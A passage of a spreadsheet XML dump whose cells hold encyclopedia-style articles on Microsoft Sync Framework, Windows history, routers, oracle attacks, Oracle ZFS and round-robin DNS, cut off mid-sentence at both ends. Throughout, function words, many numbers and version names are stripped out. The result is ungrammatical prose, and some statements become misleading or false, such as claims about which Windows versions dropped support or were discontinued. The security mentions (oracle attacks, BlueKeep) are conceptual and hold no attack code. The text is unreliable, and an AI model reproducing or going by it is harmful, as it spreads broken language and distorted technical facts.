includes replica tick count (representing progression time), conflict log, tombstone log, changes data store seen (knowledge). replica tick count pair makes version encodes state data store time. sync framework defines operation knowledge object replica: contains determines store contains specified change, union merge knowledge sets, project project knowledge subset items, exclude create knowledge without changes subset items. metadata managed metadata storage service uses in-process server compact database store metadata per-provider basis. sync services operates creating synchronization session, represented session object. synchronization session synchronizes data across synchronization providers source data store destination. instances providers passed session object. during synchronization session, destination provider sends knowledge store. source provider compares knowledge destination change source enumerate changes transfer destination. destination provider makes sure changes conflicting merges changes updates knowledge. snapshot sync (download-only sync): data data source subset synchronized clients. upload-only sync: data client merged source replica. bidirectional sync: both data sources modified independently changes synchronized other. n-level sync achieved performing multiple bidirectional synchronizations. sync services ado.net microsoft sync services ado.net synchronization provider synchronizing across databases using ado.net. ado.net datasets synchronized source destination, persisted database server. also support data sources relational database, like database service long proxy provided abstract data source data provider available proxy. sync services ado.net provider intended offline applications, data central database cached locally. application works cached data, changes uploaded batch. addition, provider also used collaborative applications, application work local dataset, synchronized periodically peer-to-peer manner participants. locally, datasets stored either using server compact database database server supporting ado.net. sync services ado.net allows incremental change tracking, allows changes replicated rather replicating entire copy. sync services file systems sync services file systems provider used synchronize file system locations, either local folders network shares. addition mirroring files, changes existing files also synchronized. changes files detected using timestamps, optionally, hashing file contents. conflicting changes file detected automatically resolved. conflicting updates file, newer edit kept. file deleted replica updated another, update take precedence delete. files different content created name across replicas, sync operation, created later persisted. rename operation caused files name, retained renaming them. deletes configured move file recycle bin, recovered necessary. sync services file systems provider also provides preview mode enumerates actions taken sync operation, without actually performing operations, view letting users review changes made. synchronization performed peer-to-peer manner. neither sync framework sync services file systems provider perform authentication accessing files; authentication application using sync framework api. files transferred without encryption. encryption transit, custom providers uses encrypted connection needs used. sync services file systems provider also supports static filters exclude files based wildcards attributes. first release, however, sync services file systems provider sync either ntfs security descriptors alternate data streams. sync services feedsync sync services feedsync provider used help synchronize replicas creating feedsync enabled feed, either atom formats, subscribed interested parties. provider also used extract items feedsync feed merge changes back data store. sync services feedsync uses another provider connect data store. sync services feedsync provides services used help synchronize data replica atom feeds. replica particular repository information synchronized.) using feedsync producer service, synchronization application work synchronization provider create list items replica atom stream. these items published interested subscribers. similarly, feedsync consumer service helps synchronization application take input atom stream, extract items synchronization provider apply appropriate changes replica. because sync framework underlies exchange feed items, feeds cross-subscribed easily synchronized another peers synchronization community. synchronization community replicas keep data synchronized other.) licensing microsoft sync framework free windows windows mobile devices. support platforms available commercial licensing porting kits. also comparison file synchronization software feedsync notes external links microsoft sync framework developer center introducing microsoft sync framework: next generation synchronization framework code magazine</t>
  </si>
  <si>
    <t>Microsoft Tape Format</t>
  </si>
  <si>
    <t>microsoft tape format (mtf) tape format used several backup tools microsoft windows platform. notable examples include microsoft's ntbackup program, backup exec backup utilities included microsoft server. several open source utilities written read non-windows platforms. references external links format</t>
  </si>
  <si>
    <t>Microsoft Virtual Server</t>
  </si>
  <si>
    <t>microsoft virtual server virtualization solution facilitated creation virtual machines windows windows vista windows server 2003 operating systems. originally developed connectix, acquired microsoft prior release. virtual microsoft's related desktop virtualization software package. virtual machines created managed web-based interface relies internet information services (iis) windows client application tool called vmrcplus. last version using name microsoft virtual server 2005 sp1. features include linux guest operating system support, virtual disk precompactor, (but guest os), host operating system support, ability mount virtual hard drives host machine additional operating systems support, including windows vista. also provides volume shadow copy writer enables live backups guest windows server 2003 windows server 2008 host. utility mount images also included since sp1. virtual machine additions linux available free download. officially supported linux guest operating systems include enterprise linux versions 2.1-5.0, linux 9.0, suse linux suse linux enterprise server versions 10.virtual server discontinued replaced hyper-v. differences virtual multimedia support virtual server (e.g. sound driver support). uses single thread whereas virtual server multi-threaded. install windows virtual server restricted install higher operating systems i.e. server 2008 windows limited 127gb .vhd (per specification), however virtual server made access .vhd 2048gb (ntfs file size). version history microsoft acquired unreleased virtual server connectix february 2003. initial release microsoft's virtual server, general availability, announced september 2004. virtual server 2005 available editions: standard enterprise. standard edition limited maximum processors host operating system enterprise edition not. 2006-04-03, microsoft made virtual server 2005 enterprise edition free download, order better compete free virtualization offerings vmware xen, discontinued standard edition. microsoft virtual server added support intel (ivt) virtualization (amd-v). limitations known limitations virtual server, september 2007, include following: will install windows server 2008 newer operating systems. upgrades vista/server2008 patched. although virtual server 2005 hosts x86-64 processors, cannot guests require x86-64 processors (guests cannot 64-bit). also makes smp, virtualize allow guests each). performance suffer instruction virtualized platform, limited direct interaction host hardware. also virtual appliance virtual disk image virtualization references external links benchmarking microsoft virtual server 2005 benchmarking vmware server microsoft virtual server 2005 enterprise edition hyperadmin: microsoft virtual server management microsoft server virtualization government agencies microsoft virtual server 2005 resource book microsoft virtual server 2005 system center virtual machine manager system requirements microsoft virtual server 2005</t>
  </si>
  <si>
    <t>Microsoft Windows</t>
  </si>
  <si>
    <t>windows group several proprietary graphical operating system families developed marketed microsoft. each family caters certain sector computing industry. active windows families include windows windows iot; encompass subfamilies (e.g. windows server windows embedded compact/windows ce). defunct windows families include windows windows mobile windows phone. microsoft introduced operating environment named windows november 1985, graphical operating system shell ms-dos response growing interest graphical user interfaces (guis).apple came windows unfair encroachment innovation development implemented products lisa macintosh (eventually settled court microsoft's favor 1993). pcs, windows still popular operating system countries. however, 2014, microsoft admitted losing majority overall operating system market android, massive growth sales android smartphones. 2014, number windows devices sold less android devices sold. according statcounter, desktop laptop computers windows approximately market share april 2022.as october 2021, recent version windows tablets windows version 21h2. recent version embedded devices windows version 21h2. recent version server computers windows server 2022, version 21h2. specialized version windows also runs xbox xbox series video game consoles. genealogy marketing role microsoft, developer windows, registered several trademarks, denotes family windows operating systems target specific sector computing industry. 2014, following windows families actively developed: windows started family operating systems windows 3.1, operating system server computers workstations. consists three operating system subfamilies released almost time share kernel: windows: operating system mainstream personal computers tablets. latest version windows main competitor family macos apple personal computers ipados android tablets (c.f. usage share operating systems market share category). windows server: operating system server computers. latest version windows server 2022. unlike client sibling, adopted strong naming scheme. main competitor family linux. (c.f. usage share operating systems market share category) windows lightweight version windows sibling, meant operate live operating system, used installing windows bare-metal computers (especially many computers once), recovery troubleshooting purposes. latest version windows windows (previously windows embedded): initially, microsoft developed windows general-purpose operating system every device resource-limited called full-fledged computer. eventually, however, windows renamed windows embedded compact folded windows compact trademark also consists windows embedded industry, windows embedded professional, windows embedded standard, windows embedded handheld windows embedded automotive.the following windows families longer developed: windows operating system targeted consumer market. discontinued suboptimal performance. world called last version, windows worst products time.) microsoft caters consumer market windows windows mobile: predecessor windows phone, mobile phone operating system. first version called pocket 2000; third version, windows mobile 2003 first version adopt windows mobile trademark. last version windows mobile 6.5. windows phone: operating system sold manufacturers smartphones. first version windows phone followed windows phone windows phone 8.1. succeeded windows mobile, also discontinued. version history term windows collectively describes several generations microsoft operating system products. these products generally categorized follows: early versions history windows dates back 1981 microsoft started work program called "interface manager". announced november 1983 (after apple lisa, macintosh) name "windows", windows released november 1985. windows compete apple's operating system, achieved little popularity. windows complete operating system; rather, extends ms-dos. shell windows program known ms-dos executive. components included calculator, calendar, cardfile, clipboard viewer, clock, control panel, notepad, paint, reversi, terminal write. windows allow overlapping windows. instead windows tiled. only modal dialog boxes appear windows. microsoft sold included windows development libraries development environment, included numerous windows samples.windows released december 1987, popular predecessor. features several improvements user interface memory management. windows 2.03 changed tiled windows overlapping windows. result change apple computer filing suit microsoft alleging infringement apple's copyrights. windows also introduced sophisticated keyboard shortcuts could make expanded memory. windows released different versions: windows/286 windows/386. windows/386 uses virtual 8086 mode intel 80386 multitask several programs paged memory model emulate expanded memory using available extended memory. windows/286, spite name, runs intel 8086 intel 80286 processors. runs real mode make high memory area.in addition full windows-packages, runtime-only versions shipped early windows software third parties made possible windows software ms-dos without full windows feature set. early versions windows often thought graphical shells, mostly ms-dos file system services. however, even earliest windows versions already assumed many typical operating system functions; notably, executable file format providing device drivers (timer, graphics, printer, mouse, keyboard sound). unlike ms-dos, windows allowed users execute multiple graphical applications time, cooperative multitasking. windows implemented elaborate, segment-based, software virtual memory scheme, allows applications larger available memory: code segments resources swapped thrown away memory became scarce; data segments moved memory given application relinquished processor control. windows windows 3.0, released 1990, improved design, mostly virtual memory loadable virtual device drivers (vxds) allow windows share arbitrary devices multi-tasked applications. windows applications protected mode, gives access several megabytes memory without obligation participate software virtual memory scheme. they inside address space, segmented memory provides degree protection. windows also featured improvements user interface. microsoft rewrote critical operations assembly. windows first version windows achieve broad commercial success, selling million copies first months.windows 3.1, made generally available march 1992, featured facelift. august 1993, windows workgroups, special version integrated peer-to-peer networking features version number 3.11, released. sold along windows 3.1. support windows ended december 2001.windows 3.2, released 1994, updated version chinese version windows 3.1. update limited language version, fixed issues related complex writing system chinese language. windows generally sold computer manufacturers ten-disk version ms-dos also simplified chinese characters basic output translated utilities. windows next major consumer-oriented release windows, windows released august 1995. while still remaining ms-dos-based, windows introduced support native 32-bit applications, plug play hardware, preemptive multitasking, long file names characters, provided increased stability predecessors. windows also introduced redesigned, object oriented user interface, replacing previous program manager start menu, taskbar, windows explorer shell. windows major commercial success microsoft; fried cnet remarked time windows finally ushered market 2001, become fixture computer desktops around world." microsoft published four service releases (osr) windows roughly equivalent service pack. first windows also first version windows bundled microsoft's browser, internet explorer. mainstream support windows ended december 2000, extended support windows ended december 2001.windows followed release windows june 1998, introduced windows driver model, support composite devices, support acpi, hibernation, support multi-monitor configurations. windows also included integration internet explorer active desktop aspects windows desktop update series enhancements explorer shell also made available windows 95). 1999, microsoft released windows second edition, updated version windows windows added internet explorer windows media player amongst upgrades. mainstream support windows ended june 2002, extended support windows ended july 2006.on september 2000, microsoft released windows (millennium edition), last dos-based version windows. windows incorporated visual interface enhancements windows nt-based counterpart windows 2000, faster boot times previous versions (which however, required removal ability access real mode environment, removing compatibility older programs), expanded multimedia functionality (including windows media player windows movie maker, windows image acquisition framework retrieving images scanners digital cameras), additional system utilities system file protection system restore, updated home networking tools. however, windows faced criticism speed instability, along hardware compatibility issues removal real mode support. world considered windows worst operating systems microsoft ever released, worst tech product time. windows version history early versions (windows 3.1/3.5/3.51/4.0/2000) november 1988, development team within microsoft (which included former digital equipment corporation developers dave cutler mark lucovsky) began work revamped version microsoft's os/2 operating system known os/2". os/2 intended secure, multi-user operating system posix compatibility modular, portable kernel preemptive multitasking support multiple processor architectures. however, following successful release windows 3.0, development team decided rework project extended 32-bit port windows known win32 instead os/2. win32 maintained similar structure windows apis (allowing existing windows applications easily ported platform), also supported capabilities existing kernel. following approval microsoft's staff, development continued windows first 32-bit version windows. however, objected changes, ultimately continued os/2 development own.windows first windows operating system based hybrid kernel. hybrid kernel designed modified microkernel, influenced mach microkernel developed richard rashid carnegie mellon university, without meeting criteria pure microkernel. first release resulting operating system, windows (named associate windows 3.1) released july 1993, versions desktop workstations servers. windows released september 1994, focusing performance improvements support novell's netware, followed windows 3.51 1995, included additional improvements support powerpc architecture. windows released june 1996, introducing redesigned interface windows series. february 2000, microsoft released windows 2000, successor 4.0. windows name dropped point order greater focus windows brand. windows next major version windows windows released october 2001. introduction windows aimed unify consumer-oriented windows series architecture introduced windows change microsoft promised would provide better performance dos-based predecessors. windows would also introduce redesigned user interface (including updated start menu "task-oriented" windows explorer), streamlined multimedia networking features, internet explorer integration microsoft's .net passport services, "compatibility mode" help provide backwards compatibility software designed previous versions windows, remote assistance functionality.at retail, windows marketed main editions: "home" edition targeted towards consumers, "professional" edition targeted towards business environments power users, included additional security networking features. home professional later accompanied "media center" edition (designed home theater pcs, emphasis support playback, tuner cards, functionality, remote controls), "tablet edition (designed mobile devices meeting specifications tablet computer, support stylus input additional pen-enabled applications). mainstream support windows ended april 2009. extended support ended april 2014.after windows 2000, microsoft also changed release schedules server operating systems; server counterpart windows windows server 2003, released april 2003. followed december 2005, windows server 2003 windows vista after lengthy development process, windows vista released november 2006, volume licensing january 2007, consumers. contained number features, redesigned shell user interface significant technical changes, particular focus security features. available number different editions, subject criticism, drop performance, longer boot time, criticism uac, stricter license agreement. vista's server counterpart, windows server 2008 released early 2008. windows july 2009, windows windows server 2008 released (release manufacturing) former released public months later october 2009. unlike predecessor, windows vista, introduced large number features, windows intended focused, incremental upgrade windows line, goal compatible applications hardware windows vista already compatible. windows multi-touch support, redesigned windows shell updated taskbar revealable jump lists contain shortcuts files frequently used specific applications shortcuts tasks within application, home networking system called homegroup, performance improvements. windows windows successor windows released generally october 2012. number significant changes made windows including introduction user interface based around microsoft's metro design language optimizations touch-based devices tablets all-in-one pcs. these changes include start screen, uses large tiles convenient touch interactions allow display continually updated information, class apps designed primarily touch-based devices. windows version required minimum resolution 1024×768 pixels, effectively making unfit netbooks 800×600-pixel screens. other changes include increased integration cloud services online platforms (such social networks microsoft's onedrive (formerly skydrive) xbox live services), windows store service software distribution, variant known windows devices utilize architecture, keyboard shortcut screenshots. update windows called windows 8.1, released october 2013, includes features live tile sizes, deeper onedrive integration, many revisions. windows windows subject criticism, removal start menu. windows september 2014, microsoft announced windows successor windows 8.1. released july 2015, addresses shortcomings user interface first introduced windows changes include return start menu, virtual desktop system, ability windows store apps within windows desktop rather full-screen mode. windows said available update qualified windows sp1, windows windows phone devices windows application (for windows windows 8.1) windows update (windows 7).in february 2017, microsoft announced migration windows source code repository perforce git. this migration involved million separate files gigabyte repository. 2017, percent engineering team using git, 8500 commits 1760 windows builds day.in june 2021, shortly microsoft's announcement windows microsoft updated lifecycle policy pages windows revealing support last release windows october 2025. windows june 2021, windows announced successor windows livestream. operating system designed user-friendly understandable. released october 2021. 2022, windows free upgrade windows users meet system requirements. windows july 2021, microsoft announced start selling subscriptions virtualized windows desktops part windows service following month. standalone version windows, service provides access windows windows built azure virtual desktop. service allow cross-platform usage, aiming make operating system available apple android users. subscription service accessible operating system browser. service attempt capitalizing growing trend, fostered covid-19 pandemic, businesses adopt hybrid remote work environment, "employees split time office home". service accessible browsers, microsoft able bypass need publish service google play apple store.microsoft announced windows availability business enterprise customers august 2021. multilingual support multilingual support built windows since windows 3.0. language keyboard interface changed region language control panel. components supported input languages, input method editors, automatically installed windows installation windows earlier, files east asian languages, chinese, right-to-left scripts, arabic, need installed separately, also said control panel). third-party imes also installed user feels provided insufficient needs. interface languages operating system free download, languages limited certain editions windows. language interface packs (lips) redistributable downloaded microsoft's download center installed edition windows later) translate most, all, windows interface, require certain base language (the language windows originally shipped with). this used languages emerging markets. full language packs, translates complete operating system, available specific editions windows (ultimate enterprise editions windows vista editions windows except single language). they require specific base language, commonly used popular languages french chinese. these languages cannot downloaded download center, available optional updates windows update service (except windows interface language installed applications affected changes windows interface language. availability languages depends application developers themselves. windows windows server 2012 introduces language control panel interface input languages simultaneously changed, language packs, regardless type, downloaded central location. settings windows windows server 2012 also includes counterpart settings page this. changing interface language also changes language preinstalled windows store apps (such mail, maps news) certain microsoft-developed apps (such remote desktop). limitations language packs however still effect, except full language packs installed edition except single language, caters emerging markets. platform support windows included support several platforms x86-based personal computer became dominant professional world. windows predecessors supported powerpc, alpha mips r4000 (although platforms implement 64-bit computing, treated 32-bit). windows 2000 dropped support platforms, except third generation (known ia-32) newer 32-bit mode. client line windows family still runs ia-32 windows server line ceased supporting platform release windows server 2008 with introduction intel itanium architecture (ia-64), microsoft released versions windows support itanium versions windows windows server 2003 released time mainstream counterparts. windows 64-bit edition, released 2005, last windows client operating systems support itanium. windows server line continues support platform windows server 2012; windows server 2008 last windows operating system support itanium architecture. april 2005, microsoft released windows professional edition windows server 2003 editions support x86-64 simply x64), 64-bit version architecture. windows vista first client version windows released simultaneously ia-32 editions. still supported. edition windows known windows specifically created computers architecture still used windows smartphones windows tablets windows updated. starting windows fall creators update (version 1709) later includes support architecture.windows first version drop support 32-bit hardware. windows windows (officially known windows embedded compact), edition windows runs minimalistic computers, like satellite navigation systems mobile phones. windows embedded compact based dedicated kernel, dubbed windows kernel. microsoft licenses windows oems device makers. oems device makers modify create user interfaces experiences, windows provides technical foundation windows used dreamcast along sega's proprietary console. windows core windows mobile derived. successor, windows phone based components windows windows 7.0. windows phone however, based nt-kernel windows windows embedded compact confused windows embedded windows embedded, modular editions windows based windows kernel. xbox xbox unofficial name given version windows runs xbox consoles. from xbox onwards implementation emphasis virtualization (using hyper-v) three operating systems running once, consisting core operating system, second implemented games windows-like environment applications. microsoft updates xbox one's every month, updates downloaded xbox live service xbox subsequently installed, using offline recovery images downloaded originally based (windows kernel, latest version runs 10.0 base. this system sometimes referred "windows xbox one" "onecore". xbox xbox series operating systems also allow limited (due licensing restrictions testing resources) backward compatibility previous generation hardware, xbox 360's system backwards compatible original xbox. version control system including every version windows 2000, microsoft used in-house version control system named source library manager (slm). shortly windows 2000 released, microsoft switched fork perforce named source depot. this system used 2017 system keep size windows. microsoft begun integrate team foundation server 2013, windows continued rely source depot. windows code divided among different repositories kind virtualization layer produce unified view code. 2017 microsoft announced would start using git, open source version control system created linus torvalds 2017 reported completed migration repository. vfsforgit because large, decades-long history, however, windows codebase especially well suited decentralized nature linux development originally created manage. each repository contains complete history files, proved unworkable windows developers cloning whole repository takes several hours. microsoft working project called virtual file system (vfsforgit) address challenges.in 2021 superseded scalar. timeline releases usage share device sales windows exceeded windows globally since early 2018.for desktop laptop computers, according applications statcounter, track operating systems devices active web, windows used operating-system family august 2021, around usage share according applications around usage share according statcounter.including personal computers kinds (e.g., desktops, laptops, mobile devices, game consoles), windows oses accounted 32.67% usage share august 2021, compared android (highest, 46.03%), ios's 13.76%, ipados's 2.81%, macos's 2.51%, according applications 30.73% usage share august 2021, compared android (highest, 42.56%), ios/ipados's 16.53%, macos's 6.51%, according statcounter.those statistics include servers (including so-called cloud computing, microsoft known leader, linux used windows), applications statcounter browsing proxy use. security consumer versions windows originally designed ease-of-use single-user without network connection, security features built outset. however, windows successors designed security (including network) multi-user pcs, initially designed internet security mind much, since, first developed early 1990s, internet less prevalent.these design issues combined programming errors (e.g. buffer overflows) popularity windows means frequent target computer worm virus writers. june 2005, bruce schneier's counterpane internet security reported seen 1,000 viruses worms previous months. 2005, kaspersky found around 11,000 malicious programs viruses, trojans, back-doors, exploits written windows.microsoft releases security patches windows update service approximately month (usually second tuesday month), although critical updates made available shorter intervals necessary. versions windows including windows 2000 windows updates automatically downloaded installed user selects result, service pack windows well service pack windows server 2003, installed users quickly otherwise might been.while windows series offered option profiles multiple users, concept access privileges, allow concurrent access; true multi-user operating systems. addition, implemented partial memory protection. they accordingly widely criticised lack security. windows series operating systems, contrast, true multi-user, implement absolute memory protection. however, advantages true multi-user operating system nullified fact that, prior windows vista, first user account created setup process administrator account, also default accounts. though windows limited accounts, majority home users change account type fewer rights partially number programs unnecessarily required administrator rights home users administrator time. windows vista changes introducing privilege elevation system called user account control. when logging standard user, logon session created token containing basic privileges assigned. way, logon session incapable making changes would affect entire system. when logging user administrators group, separate tokens assigned. first token contains privileges typically awarded administrator, second restricted token similar standard user would receive. user applications, including windows shell, started restricted token, resulting reduced privilege environment even administrator account. when application requests higher privileges "run administrator" clicked, prompt confirmation and, consent given (including administrator credentials account requesting elevation member administrators group), start process using unrestricted token.leaked documents published wikileaks, codenamed vault dated 2013 2016, detail capabilities perform electronic surveillance cyber warfare, ability compromise operating systems windows.in august 2019, computer experts reported bluekeep security vulnerability, cve-2019-0708, potentially affects older unpatched windows versions program's remote desktop protocol, allowing possibility remote code execution, include related flaws, collectively named dejablue, affecting newer windows versions (i.e., windows recent versions) well. addition, experts reported microsoft security vulnerability, cve-2019-1162, based legacy code involving microsoft ctfmon (ctfmon.exe), affects windows versions windows recent windows versions; patch correct flaw currently available. file permissions windows versions windows based file system permission system referred agdlp (accounts, global, domain local, permissions) file permissions applied file/folder form 'local group' 'global groups' members. these global groups hold groups users depending different windows versions used. this system varies vendor products linux netware 'static' allocation permission applied directly file folder. however using process aglp/agdlp/agudlp allows small number static permissions applied allows easy changes account groups without reapplying file permissions files folders. alternative implementations owing operating system's popularity, number applications released provide compatibility windows applications, either compatibility layer another operating system, standalone system software written windows box. these include: wine free open-source implementation windows api, allowing many windows applications x86-based platforms, including unix, linux macos. wine developers refer "compatibility layer" windows-style apis emulate windows environment. crossover wine package licensed fonts. developers regular contributors wine, focus wine running officially supported applications. cedega proprietary fork wine transgaming technologies, designed specifically running windows games linux. version cedega known cider allows windows games macos. since wine licensed lgpl, cedega unable port improvements made wine proprietary codebase. cedega ceased service february 2011. darwine port wine macos darwin. operates running wine qemu. linux unified kernel patches linux kernel allowing many windows executable files linux (using wine dlls); windows drivers used. reactos open-source intended software windows, originally designed simulate windows 4.0, aiming windows compatibility. development stage since 1996. linspire formerly lindowsos, commercial linux distribution initially created goal running major windows software. changed name linspire microsoft lindows. discontinued favor xandros desktop, also later discontinued. freedows open-source attempt creating windows clone platforms, intended released general public license. started 1996, reece sellin, project never completed, getting stage design discussions featured number novel concepts suspended 2002. also references external links official website official windows blog microsoft developer network windows developer center microsoft windows history timeline pearson education, informit history microsoft windows microsoft business software solutions windows release information</t>
  </si>
  <si>
    <t>Router (computing)</t>
  </si>
  <si>
    <t>router networking device forwards data packets computer networks. routers perform traffic directing functions internet. data sent internet, page email, form data packets. packet typically forwarded router another router networks constitute internetwork (e.g. internet) reaches destination node.a router connected data lines different networks. when data packet comes lines, router reads network address information packet header determine ultimate destination. then, using information routing table routing policy, directs packet next network journey. familiar type routers home small office routers simply forward packets home computers internet. more sophisticated routers, enterprise routers, connect large business networks powerful core routers forward data high speed along optical fiber lines internet backbone. operation when multiple routers used interconnected networks, routers exchange information destination addresses using routing protocol. each router builds routing table, list routes, computer systems interconnected networks.the software runs router composed functional processing units operate simultaneously, called planes: control plane: router maintains routing table lists route used forward data packet, physical interface connection. using internal pre-configured directives, called static routes, learning routes dynamically using routing protocol. static dynamic routes stored routing table. control-plane logic strips non-essential directives table builds forwarding information base (fib) used forwarding plane. forwarding plane: this unit forwards data packets incoming outgoing interface connections. reads header packet comes matches destination entries supplied control plane, directs packet outgoing network specified fib. applications router interfaces different types physical layer connections, copper cables, fiber optic, wireless transmission. also support different network layer transmission standards. each network interface used enable data packets forwarded transmission system another. routers also used connect logical groups computer devices known subnets, different network prefix. routers provide connectivity within enterprises, enterprises internet, internet service providers' (isps') networks. largest routers (such cisco crs-1 juniper ptx) interconnect various isps, used large enterprise networks. smaller routers usually provide connectivity typical home office networks. sizes routers found inside enterprises. powerful routers usually found isps, academic research facilities. large businesses also need powerful routers cope ever-increasing demands intranet data traffic. hierarchical internetworking model interconnecting routers large networks common use. access, core distribution access routers, including small office/home office (soho) models, located home customer sites branch offices need hierarchical routing own. typically, optimized cost. some soho routers capable running alternative free linux-based firmware like tomato, openwrt, dd-wrt.distribution routers aggregate traffic multiple access routers. distribution routers often responsible enforcing quality service across wide area network (wan), considerable memory installed, multiple interface connections, substantial onboard data processing routines. they also provide connectivity groups file servers external networks.in enterprises, core router provide collapsed backbone interconnecting distribution tier routers multiple buildings campus, large enterprise locations. they tend optimized high bandwidth, lack features edge routers. security external networks must carefully considered part overall security strategy local network. router include firewall, handling, security functions, handled separate devices. routers also commonly perform network address translation restricts connections initiated external connections recognized security feature experts. some experts argue open source routers secure reliable closed source routers open-source routers allow mistakes quickly found corrected. routing different networks routers also often distinguished basis network operate. router local area network (lan) single organisation called interior router. router operated internet backbone described exterior router. while router connects internet wide area network (wan) called border router, gateway router. internet connectivity internal routers intended major enterprise connectivity usually exchange routing information using border gateway protocol (bgp). 4098 defines types routers according functions: edge router (also called provider edge router): placed edge network. router uses exterior border gateway protocol (ebgp) routers isps large enterprise autonomous systems. subscriber edge router (also called customer edge router): located edge subscriber's network, also uses ebgp provider's autonomous system. typically used (enterprise) organization. inter-provider border router: router interconnecting isps maintains sessions routers autonomous systems. core router: resides within autonomous system backbone carry traffic edge routers. within isp: isp's autonomous system, router uses internal communicate edge routers, intranet core routers, isp's intranet provider border routers. internet backbone: internet longer clearly identifiable backbone, unlike predecessor networks. default-free zone (dfz). major isps' system routers make could considered current internet backbone core. isps operate four types routers described here. core router used interconnect edge border routers. core routers also specialized functions virtual private networks based combination multi-protocol label switching protocols. port forwarding: routers also used port forwarding private internet-connected servers. voice, data, fax, video processing routers: commonly referred access servers gateways, devices used route process voice, data, video traffic internet. since 2005, long-distance phone calls processed traffic (voip) voice gateway. access server-type routers expanded advent internet, first dial-up access another resurgence voice phone service. larger networks commonly multilayer switches, layer-3 devices used simply interconnect multiple subnets within security zone, higher-layer switches filtering, translation, load balancing, higher-level functions required, especially zones. history concept interface computer first proposed donald davies network 1966. idea conceived wesley clark following year arpanet. named interface message processors (imps), computers fundamentally functionality router today. idea router (called gateway time) initially came international group computer networking researchers called international networking working group (inwg). 1972 informal group consider technical issues involved connecting different networks, became subcommittee international federation information processing later year. these gateway devices different previous packet switching schemes ways. first, connected dissimilar kinds networks, serial lines local area networks. second, connectionless devices, role assuring traffic delivered reliably, leaving function entirely hosts. this particular idea, end-to-end principle, previously pioneered cyclades network. idea explored detail, intention produce prototype system part contemporaneous programs. initial darpa-initiated program, created tcp/ip architecture today. program xerox parc explore networking technologies, produced parc universal packet system; corporate intellectual property concerns received little attention outside xerox years. some time early 1974, first xerox routers became operational. first true router developed ginny strazisar bbn, part darpa-initiated effort, 1975–1976. 1976, three pdp-11-based routers service experimental prototype internet.the first multiprotocol routers independently created staff researchers stanford 1981 also based pdp-11s. stanford's router program william yeager mit's noel chiappa. virtually networking uses tcp/ip, multiprotocol routers still manufactured. they important early stages growth computer networking protocols tcp/ip use. modern routers handle ipv4 ipv6 multiprotocol simpler devices ones processing appletalk, decnet, xerox protocols. from mid-1970s 1980s, general-purpose minicomputers served routers. modern high-speed routers network processors highly specialized computers extra hardware acceleration added speed common routing functions, packet forwarding, specialized functions ipsec encryption. there substantial linux unix software-based machines, running open source routing code, research applications. cisco operating system independently designed. major router operating systems, junos nx-os, extensively modified versions unix software. forwarding main purpose router connect multiple networks forward packets destined either directly attached networks remote networks. router considered layer-3 device primary forwarding decision based information layer-3 packet, specifically destination address. when router receives packet, searches routing table find best match destination address packet addresses routing table. once match found, packet encapsulated layer-2 data link frame outgoing interface indicated table entry. router typically look packet payload, layer-3 addresses make forwarding decision, plus optionally information header hints example, quality service (qos). pure forwarding, router designed minimize state information associated individual packets. once packet forwarded, router retain historical information packet.the routing table contain information derived variety sources, default static routes configured manually, dynamic entries routing protocols router learns routes routers. default route used route traffic whose destination otherwise appear routing table; common even necessary small networks, home small business default route simply sends non-local traffic internet service provider. default route manually configured static route); learned dynamic routing protocols; obtained dhcp.a router routing protocol time, particularly serves autonomous system border router parts network different routing protocols; redistribution used (usually selectively) share information different protocols running router.besides deciding interface packet forwarded, handled primarily routing table, router also manage congestion packets arrive rate higher router process. three policies commonly used tail drop, random early detection (red), weighted random early detection (wred). tail drop simplest easily implemented: router simply drops incoming packets buffer space router exhausted. probabilistically drops datagrams early queue exceeds pre-configured portion buffer, reaching pre-determined maximum, drops incoming packets, thus reverting tail drop. wred configured drop packets readily dependent type traffic. another function router performs traffic classification deciding packet processed first. this managed qos, critical voice deployed, introduce excessive latency.yet another function router performs called policy-based routing special rules constructed override rules derived routing table packet forwarding decision made.some functions performed application-specific integrated circuit (asic) avoid overhead scheduling time process packets. others performed packets need special attention cannot handled asic. also mobile broadband modem modem residential gateway switch virtual interface wireless router notes references external links</t>
  </si>
  <si>
    <t>Oracle attack</t>
  </si>
  <si>
    <t>field security engineering, oracle attack attack exploits availability weakness system used "oracle" give simple go/no indication inform attackers close goals. attacker combine oracle systematic search problem space complete attack.the padding oracle attack, compression oracle attacks breach, examples oracle attacks, practice "crib-dragging" cryptanalysis enigma machine. oracle need 100% accurate: even small statistical correlation correct go/no result frequently enough systematic automated attack. compression oracle attack adaptive data compression mixture chosen plaintext unknown plaintext result content-sensitive changes length compressed text detected even though content compressed text encrypted. this used protocol attacks detect injected known plaintext even partially similar unknown content secret part message, greatly reducing complexity search match secret text. crime breach attacks examples protocol attacks using phenomenon. also side-channel attack references</t>
  </si>
  <si>
    <t>Oracle ZFS</t>
  </si>
  <si>
    <t>oracle proprietary file system logical volume manager. scalable, includes extensive protection data corruption, support high storage capacities, efficient data compression, integration concepts filesystem volume management, snapshots copy-on-write clones, continuous integrity checking automatic repair, raid-z, native nfsv4 acls, precisely configured. registered trademark belonging oracle. history implementations solaris update later, part sun's solaris operating system thus available sparc x86-based systems. solaris after oracle's solaris express release, os/net consolidation (the main code) made proprietary closed-source, upgrades implementations inside solaris (such encryption) compatible non-proprietary implementations previous versions zfs. when creating pool, retain ability access pool non-proprietary solaris-based distributions, recommended upgrade solaris express opensolaris (snv_134b), thereby stay version future development september 2017, simon phipps reported oracle laid virtually solaris core development staff, interpreting sign oracle longer intends support future development platform. version history references external links</t>
  </si>
  <si>
    <t>Round-robin DNS</t>
  </si>
  <si>
    <t>round-robin technique load distribution, load balancing, fault-tolerance provisioning multiple, redundant internet protocol service hosts, e.g., server, servers, managing domain name system's (dns) responses address requests client computers according appropriate statistical model.in simplest implementation, round-robin works responding requests single potential address, list potential addresses corresponding several servers host identical services. order addresses list returned basis term round robin. with response, address sequence list permuted. traditionally, clients initially attempt connections first address returned query, different connection attempts, clients would receive service different providers, thus distributing overall load among servers. some resolvers attempt re-order list give priority numerically "closer" networks. this behaviour standardized definition ipv6, blamed defeating round-robin load-balancing. some desktop clients alternate addresses connection timeout seconds.round-robin often used load balance requests among number servers. example, company domain name three identical copies site residing three servers three addresses. server domain name multiple records, address. when user accesses home page sent first address. second user accesses home page sent next address, third user sent third address. case, address given out, goes list. fourth user, therefore, sent first address, forth. round-robin name rare occasions, referred "rotor" rotation among alternative records. drawbacks although easy implement, round-robin number drawbacks, arising record caching hierarchy itself, well client-side address caching reuse, combination difficult manage. round-robin solely relied upon service availability. service addresses list fails, continue hand address clients still attempt reach inoperable service. round-robin best choice load balancing own, since merely alternates 